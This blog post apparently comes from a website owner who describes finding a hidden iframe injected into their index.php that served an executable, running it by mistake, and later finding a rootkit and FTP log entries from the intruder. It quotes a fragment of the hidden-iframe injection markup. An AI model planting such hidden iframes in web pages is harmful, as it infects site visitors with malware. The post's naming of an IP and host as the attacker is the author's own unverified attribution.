Found this f*cker at the bottom of index.php. The file was in the top level and IE kindly downloaded it for me. It’s late, it’s my own site, and I wasn’t paying attention. I ran it. I don’t know what’s going to happen. I’m running a McAfee scan – it didn’t flag the executable – and I suppose I should grab AdAware or Spybot S&D or both.
src=’upgrade.exe’ width=5 height=5
style=’display:none’></IFRAME>
Now if you’ll excuse me, I’m going to go boil my laptop.
Update 11/19:
IE went out to a bunch of sites this morning looking for a page called hltraff.php. Not good. It also killed McAfee and won’t let me do a system restore. I found the installation and as I looked at the file it disappeared from the directory. I guess I’m going to have to reformat and start over.
Update 11/25:
I am so pwned.
First access of this file – the first person who was infected by my site – gives me an idea when it was uploaded to my server.
That’s someone who my webpage may have infected. After that the accesses come several times a page.
This is the ftp access where the hacker uploaded the infection and the hacked index.php:
Sun Nov 18 15:12:51 2007 18 66.246.252.53 543744 /var/www/vhosts/
Sun Nov 18 15:12:51 2007 0 66.246.252.53 94 /var/www/vhosts/
Sun Nov 18 15:12:51 2007 0 66.246.252.53 185 /var/www/vhosts/
Sun Nov 18 15:42:47 2007 0 66.246.252.53 185 /var/www/vhosts/
66.246.252.53 resolves to sr178.2dayhost.com – that’s the hacker.
Update: It installed a rootkit. Grrrr.